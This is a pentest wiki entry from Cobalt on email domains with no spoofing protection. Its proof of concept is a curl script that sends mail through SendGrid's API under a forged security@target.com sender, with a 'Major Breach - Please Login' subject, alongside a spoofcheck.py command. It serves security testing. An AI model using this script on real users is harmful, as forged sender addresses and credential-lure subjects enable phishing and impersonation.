Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V14 - Config

Mail Server Misconfiguration - No Spoofing Protection on Email Domain

POC

Test spoofing with the following bash script

!/bin/sh

SGUSER="" SGPASS="" SGTO=testemailaccount@outlook.com SGTONAME='Test' SGFROM=security@target.com SGFROMNAME='Target Team' SGSUBJECT='Major Breach - Please Login to Change Password' SGTEXT="Good Evening,%0a%0aThis is a Spoofed Email. It could contain malicious files or links to trick your users into compromising their machines.%0a%0aBest Regards,%0a" curl -d "to=${SGTO}&toname=${SGTONAME}&fromname=${SGFROMNAME}&subject=${SGSUBJECT}&text=${SGTEXT}&from=${SGFROM}&apiuser=${SGUSER}&apikey=${SGPASS}" https://api.sendgrid.com/api/mail.send.json echo "\n"

python spoofcheck.py target.com

You can test if spoofing is legitimate by sending a spoofed email using Send Grid.

Impact

High

Likelihood

High